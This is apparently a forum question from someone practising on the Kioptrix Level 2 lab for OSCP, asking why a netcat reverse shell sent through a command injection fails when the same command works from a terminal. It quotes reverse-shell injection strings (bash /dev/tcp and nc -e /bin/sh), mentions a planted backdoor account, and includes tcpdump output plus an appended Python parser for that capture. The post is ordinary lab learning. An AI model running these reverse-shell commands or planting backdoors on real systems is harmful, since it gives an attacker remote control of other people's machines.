I've completed the Kioptrix Level 2 challenge via SQL injection, command injection, a bash reverse shell, and local privilege escalation as part of my OSCP preparation.
https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
; bash -i >& /dev/tcp/10.10.13.37/4444 0>&1
My question is: why does a netcat reverse shell executed in the web browser via the command injection bug not work, when it works just fine via the terminal?
My Setup
Kali - 10.10.13.37
Kioptrix 2 - 10.10.13.254
netcat listener
kali@kali:~$ nc -lp 4444
I've verified that TCP port 4444 is open
kali@kali:~$ ss -antp | g 4444
LISTEN 0 1 0.0.0.0:4444 0.0.0.0:* users:(("nc",pid=3003,fd=3))
kali@kali:~$
However, a netcat reverse shell executed in the web browser via the command injection bug doesn't work:
; nc 10.10.13.37 4444
; nc 10.10.13.37 4444 -e /bin/sh
No traffic at all
kali@kali:~$ sudo tcpdump -nni eth0 port 4444
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
However, when I repeat the same process with netcat executed in the Kioptrix 2 terminal, I am able to get the reverse shell set up on Kali.
The backdoor user used here was created right after I got root access via the privilege escalation bug.
[backdoor@kioptrix ~]$ nc 10.10.13.37 4444 -e /bin/sh
The reverse shell via the terminal is working fine:
kali@kali:~$ nc -lp 4444
id
uid=502(backdoor) gid=502(backdoor) groups=0(root),10(wheel),500(john),501(harold),502(backdoor)
tcpdump traffic; the last 4 packets were for the id command:
kali@kali:~$ sudo tcpdump -nni eth0 port 4444
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
00:58:29.307806 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [S], seq 1943169723, win 5840, options [mss 1460,sackOK,TS val 12217959 ecr 0,nop,wscale 2], length 0
00:58:29.307851 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [S.], seq 869624996, ack 1943169724, win 65160, options [mss 1460,sackOK,TS val 714133810 ecr 12217959,nop,wscale 7], length 0
00:58:29.308412 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 1, win 1460, options [nop,nop,TS val 12217960 ecr 714133810], length 0
00:59:55.154330 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [P.], seq 1:4, ack 1, win 510, options [nop,nop,TS val 714219657 ecr 12217960], length 3
00:59:55.157180 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 4, win 1460, options [nop,nop,TS val 12303857 ecr 714219657], length 0
00:59:55.159646 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [P.], seq 1:98, ack 4, win 1460, options [nop,nop,TS val 12303859 ecr 714219657], length 97
00:59:55.159656 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [.], ack 98, win 510, options [nop,nop,TS val 714219662 ecr 12303859], length 0
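As an added example (not part of the original post), here is a small Python parser for the tcpdump lines quoted above, read from the defender's side: it shows which host sent the SYN (the target reaching out to the listener, which is what distinguishes a reverse shell from an inbound connection) and checks that the two data pushes, 3 and 97 bytes, are exactly `id` plus a newline and the uid line plus a newline. The only input is the capture copied from the post.

```python
import re
from collections import defaultdict

# tcpdump output copied from the working, terminal-initiated capture in the post.
CAPTURE = """\
00:58:29.307806 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [S], seq 1943169723, win 5840, options [mss 1460,sackOK,TS val 12217959 ecr 0,nop,wscale 2], length 0
00:58:29.307851 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [S.], seq 869624996, ack 1943169724, win 65160, options [mss 1460,sackOK,TS val 714133810 ecr 12217959,nop,wscale 7], length 0
00:58:29.308412 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 1, win 1460, options [nop,nop,TS val 12217960 ecr 714133810], length 0
00:59:55.154330 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [P.], seq 1:4, ack 1, win 510, options [nop,nop,TS val 714219657 ecr 12217960], length 3
00:59:55.157180 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 4, win 1460, options [nop,nop,TS val 12303857 ecr 714219657], length 0
00:59:55.159646 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [P.], seq 1:98, ack 4, win 1460, options [nop,nop,TS val 12303859 ecr 714219657], length 97
00:59:55.159656 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [.], ack 98, win 510, options [nop,nop,TS val 714219662 ecr 12303859], length 0
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\].*length (?P<len>\d+)$"
)

def parse_capture(text):
    """One dict per packet line; tcpdump banner lines do not match and are skipped."""
    pkts = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        p = m.groupdict()
        p.update(sport=int(p["sport"]), dport=int(p["dport"]), len=int(p["len"]))
        pkts.append(p)
    return pkts

def summarize_flow(pkts):
    """The SYN sender is the side that reached out; with a reverse shell that is the
    target, not the listener. Also total the payload bytes each side pushed."""
    syn = next(p for p in pkts if p["flags"] == "S")
    initiator, listener = syn["src"], syn["dst"]
    synack = any(p["flags"] == "S." and p["src"] == listener for p in pkts)
    ack = any(p["flags"] == "." and p["src"] == initiator for p in pkts)
    pushed = defaultdict(int)
    for p in pkts:
        if "P" in p["flags"]:
            pushed[p["src"]] += p["len"]
    return {"initiator": initiator, "listener": listener, "listener_port": syn["dport"],
            "handshake_complete": synack and ack, "pushed_bytes": dict(pushed)}

def matches_transcript(summary, typed, output):
    """Wire byte counts should equal the shell transcript: each line typed at the
    listener and each line returned by the shell ends in a newline."""
    from_listener = summary["pushed_bytes"].get(summary["listener"], 0)
    from_target = summary["pushed_bytes"].get(summary["initiator"], 0)
    return from_listener == len(typed) + 1 and from_target == len(output) + 1
```

Run against the failing browser attempt, `parse_capture` returns an empty list, which is exactly the "no traffic at all" symptom: the target never even sent a SYN.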